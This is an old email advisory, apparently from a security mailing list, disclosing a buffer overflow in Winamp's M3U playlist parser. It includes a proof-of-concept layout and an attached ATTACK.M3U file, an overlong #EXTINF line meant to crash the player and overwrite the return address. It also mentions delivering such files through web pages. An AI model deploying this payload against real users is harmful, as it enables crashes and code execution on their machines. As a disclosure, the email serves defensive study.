This is a multi-part message in MIME format. ------=_NextPart_000_6492_74c$21af Content-Type: text/plain; format=flowed LEGAL NOTICE: By reading this you do agree that life does not make sense and it doesn't need to. You also agree to wear a condom. You do agree to think about nature. .. umm you also agree to GPL all software you've ever written. [Click here if you're under 18] There is a buffer overflow security vulnerability in Winamp's (http://www.winamp.com) M3U playlist parser. The overflow happens when an M3U extension called "#EXTINF:" is being handled. The size of the parameter following that keyword is not checked. Real world example: --cut-here-and-paste-to-a-file-with-m3u-extension-- #EXTM3U #EXTINF:AAAAAAAAA....AAAAAAAAA --cut here-- There should be at least 280 A's. The overflow allows total control over ones computer. For example one could embedd an M3U file to a web page several ways: - - - I have tested the first one but I have Media Player installed on this computer and my browser uses its components for the latter two so I cannot confirm.. The only problem is some structure (FILE *?) after the buffer because it has a zero in it and it must not be crafted to successfully return from the function. I had to apply some trial and error to get code executed. Currently the code crafts Winamp's MOD file format support until restarted (I presume so.. :-). The attached .M3U file should crash Winamp at 0000:41414141. I've tested it with Windows 98 and Windows 95 with Winamp versions 2.62 and 2.64. Thank you.. I might not be available too frequently to answer your mail.. Have a nice life. Bye. ________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com ------=_NextPart_000_6492_74c$21af Content-Type: text/plain; name="ATTACK.M3U"; format=flowed Content-Transfer-Encoding: 8bit Content-Disposition: attachment; filename="ATTACK.M3U" #EXTM3U #EXTINF:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ĄPPPPAAAA ------=_NextPart_000_6492_74c$21af--